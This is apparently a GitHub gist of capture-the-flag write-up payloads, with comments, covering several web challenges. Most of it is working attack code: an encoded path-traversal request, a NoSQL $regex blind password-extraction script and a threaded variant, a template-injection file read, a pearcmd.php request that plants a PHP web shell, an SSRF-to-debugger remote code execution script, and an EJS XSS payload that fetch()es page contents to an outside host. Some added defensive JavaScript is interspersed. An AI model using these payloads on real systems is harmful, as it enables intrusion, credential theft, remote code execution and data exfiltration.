@TheGrandPew
Last active September 14, 2021 04:51

EASYPHP

```http
GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1
Host: 124.71.132.232:60080
User-Agent: AG
```

CandySHOP

leak:

```python
import requests
import urllib3
urllib3.disable_warnings()

username = "rabbit"
password = ""
u = "http://123.60.21.23:23333/user/login"

# Recover the password one hex character at a time: the login responds with
# "You Bad Bad" whenever the injected $regex prefix matches, so each round
# extends the known prefix by one character.
while True:
    print("REPEAT")
    for c in 'abcdef0123456789':
        payload = 'username=%s&password[$regex]=^%s' % (username, password + c)
        r = requests.post(u, data=payload, headers={"Content-Type": "application/x-www-form-urlencoded"})
        print("LOOP")
        if 'You Bad Bad' in r.text:
            print("Found one more char : %s" % (password + c))
            password += c
            break
    else:
        # No character extended the prefix, so the whole password is known.
        print("Done: %s" % password)
        break
```

Template Injection:

```text
address=a"+x=`${process.mainModule.require('fs').readFileSync('/flag.txt')}`+g="b
```

Verysafe

Write php shell to tmp:

```http
GET /../usr/local/lib/php/pearcmd.php?f=pearcmd&+-s+-c+/tmp/pewpewpewshell.php+-d+preferred_mirror="<?system($_GET[1]);?>" HTTP/1.1
Host: host
Content-Length: 0
```

HIPHOP

Use the VS Code debug port to get RCE, then an HHVM 0day.

```python
import requests
import urllib.parse
import base64

# Hack source to drop on the target; the command-whitelist bypass was censored by the author.
code = b"""<?hh
<<__EntryPoint>>
function main(): void {
  <cmd whitelist bypass that i censored :( >
}"""
code = base64.b64encode(code).decode()

# Debug Adapter Protocol messages for the HHVM VS Code debugger, each NUL-terminated.
packet = '{"command":"attach","arguments":{"name":"HHVM: Attach to Server","type":"hhvm","request":"attach","host":"localhost","port":8999,"remoteSiteRoot":"/tmp/censored","localWorkspaceRoot":"/tmp/censored2","__configurationTarget":5,"__sessionId":"9a121298-30b3-4be1-86ab-30fa15b036b6","sandboxUser":"user"},"type":"request","seq":2}\x00'
packet += '{"command":"setExceptionBreakpoints","arguments":{"filters":[]},"type":"request","seq":3}\x00'
packet += '{"command":"configurationDone","type":"request","seq":4}\x00'
packet += '{"command":"threads","type":"request","seq":5}\x00'
packet += '{"command":"evaluate","arguments":{"expression":"file_put_contents(\\"/var/www/html/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php\\",base64_decode(\\"findme\\"))","context":"repl"},"type":"request","seq":6}\x00'.replace('findme', code)

# Double URL-encode: once for the gopher:// request body, once for the ?url= parameter.
packet = urllib.parse.quote_plus(urllib.parse.quote_plus(packet))

# Send through the SSRF endpoint to the local debugger port, then fetch the written file.
r = requests.get("http://124.71.132.232:58080/?url=gopher://localhost:8999/_" + packet)
r = requests.get("http://124.71.132.232:58080/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php")
print(r.text)
```

XSS IT

EJS 0DAY RIGHT HERE

```text
http://host:3333/?asoul={"jiaran":"A","xiangwan":"x","beila":"A","jiale":"x","nailin":"A","__append":"A","filename":"
function rethrow(){fetch(`http://sitetosenddatto.com/?${btoa(document.documentElement.innerHTML)}`)}//"}
```
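The XSS IT payload above smuggles EJS option names (`filename`) and compiler-internal names (`__append`) in through the same object that carries the template data. EJS's two-argument `render(template, data)` copies option names such as `filename` out of `data` into the compile options, so a render call fed straight from the query string lets the request steer compilation. The helper below is an added example written for this writeup, not code from the gist or from the challenge; it assumes the five template field names shown in the payload and a server-side template path `asoul.ejs`, and it does not require `ejs` itself.

```javascript
// Allow-list render data and keep options separate from it.
// Names that must never come from the request: EJS options and internals.
const EJS_OPTION_NAMES = new Set([
  "filename", "delimiter", "outputFunctionName", "_with", "client",
  "compileDebug", "debug", "strict", "async", "rmWhitespace", "scope", "context",
]);

// The template variables the challenge page expects (taken from the payload above).
const TEMPLATE_FIELDS = ["jiaran", "xiangwan", "beila", "jiale", "nailin"];

// Detection: a request object carrying option names or dunder-prefixed keys is
// trying to reach past the template data; worth logging before it is dropped.
function isSuspicious(userObject) {
  if (!userObject || typeof userObject !== "object") return false;
  return Object.keys(userObject).some(
    (k) => EJS_OPTION_NAMES.has(k) || k.startsWith("__")
  );
}

// Build the arguments for ejs.render(template, data, opts):
//  - data holds only allow-listed, string-valued fields;
//  - opts is always supplied as an explicit third argument with a fixed
//    filename, so EJS never consults the data object for options.
function buildRenderArgs(userObject) {
  if (!userObject || typeof userObject !== "object" || Array.isArray(userObject)) {
    throw new TypeError("expected a plain object of template fields");
  }
  const data = {};
  const rejected = [];
  for (const [key, value] of Object.entries(userObject)) {
    if (TEMPLATE_FIELDS.includes(key) && typeof value === "string") {
      data[key] = value;
    } else {
      rejected.push(key); // "filename", "__append", non-string values, unknown names
    }
  }
  const opts = { filename: "asoul.ejs" }; // assumed server-side template path
  return { data, opts, rejected };
}
```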
@krnbhargav

Do not mind, sir, I have a problem in candyshop, but
[image]
I am not getting any result.
Can you please illustrate why that's not working, and
please tell me how you made this payload of SSTI?

krnbhargav commented Sep 13, 2021

Candy Shop
Can also use this to exfiltrate the rabbit password (for very fast retrieval, use at least 20 threads).
./exploit.py <THREADS>

```python
#!/usr/bin/env python3
from requests import post
from concurrent.futures import ThreadPoolExecutor, as_completed
from sys import argv

THREADS = 5
host = "http://123.60.21.23:23333/"
url = host + "user/login"
passw = ""
allowed_char = "abcdef0123456789"

def brute(x: str) -> str:
    """Test one candidate prefix; a matching $regex prefix is confirmed by 'You Bad Bad'."""
    global passw
    try:
        r = post(url, data={"username": "rabbit", "password[$regex]": "^" + x})
        if r.status_code == 200:
            if "You Bad Bad &gt;_&lt;" in r.text:
                passw = x
                print(passw)
                return "find"
            elif len(passw) == 64:  # full 64-character password already recovered
                return "stop"
            else:
                return "false"
    except Exception as e:
        print(e)

def main():
    print(f"THREADS : {THREADS}")
    loop = True
    while loop:
        try:
            # One job per candidate character; leave the round as soon as one hits.
            with ThreadPoolExecutor(max_workers=THREADS) as p:
                jobs = [p.submit(brute, passw + x) for x in allowed_char]
                for job in as_completed(jobs):
                    if job.result() == "find":
                        break
                    elif job.result() == "stop":
                        loop = False
                        break
        except KeyboardInterrupt:
            break

if __name__ == "__main__":
    # Only override the thread count when an argument was actually supplied.
    if len(argv) > 1:
        THREADS = int(argv[1])
    main()
```

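Both the CandySHOP leak script in the gist and the threaded version in the comment above work because the login handler receives `password[$regex]=^<prefix>` as the object `{ password: { $regex: "^<prefix>" } }` and uses it verbatim as a query filter. The block below is an added example written for this writeup, not code from the gist or from the challenge: it reproduces that parsing shape, shows a filter builder that rejects non-string credentials, and gives a check that flags operator keys in a parsed body, which is what a login endpoint should log and refuse. It does not talk to any database.

```javascript
// Minimal qs-style parser: one level of bracket nesting, enough to show what
// express.urlencoded({ extended: true }) hands to the route handler.
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = eq < 0 ? pair : pair.slice(0, eq);
    const rawVal = eq < 0 ? "" : pair.slice(eq + 1);
    const key = decodeURIComponent(rawKey.replace(/\+/g, " "));
    const value = decodeURIComponent(rawVal.replace(/\+/g, " "));
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(key); // "password[$regex]"
    if (m) {
      out[m[1]] = Object.assign(out[m[1]] || {}, { [m[2]]: value });
    } else {
      out[key] = value;
    }
  }
  return out;
}

// Vulnerable shape: whatever the parser produced becomes the query filter,
// so an object value such as { $regex: "^a" } is evaluated as an operator.
function vulnerableFilter(form) {
  return { username: form.username, password: form.password };
}

// Hardened shape: credentials must be plain strings; objects, arrays and
// anything else are refused before a query is ever built.
function hardenedFilter(form) {
  for (const field of ["username", "password"]) {
    if (typeof form[field] !== "string") {
      throw new TypeError(`${field} must be a string, got ${typeof form[field]}`);
    }
  }
  return { username: form.username, password: form.password };
}

// Detection: true when any nested key is an operator ($regex, $ne, $gt, ...).
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value && typeof value === "object") {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith("$") || containsOperator(v)
    );
  }
  return false;
}
```

Running `containsOperator` over parsed login bodies is also a cheap way to spot the prefix-by-prefix pattern in request logs, since every probe carries a `$regex` key.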
@TheGrandPew (Author)

> Do not mind, sir, I have a problem in candyshop, but
> [image]
> I am not getting any result.
> Can you please illustrate why that's not working, and
> please tell me how you made this payload of SSTI?

The template payload I wrote from memory; maybe the flag is not in /flag.txt. Maybe try to use child_process to get a shell.

@krnbhargav

> > Do not mind, sir, I have a problem in candyshop, but
> > [image]
> > I am not getting any result.
> > Can you please illustrate why that's not working, and
> > please tell me how you made this payload of SSTI?
>
> The template payload I wrote from memory; maybe the flag is not in /flag.txt. Maybe try to use child_process to get a shell.

OK, I will try.
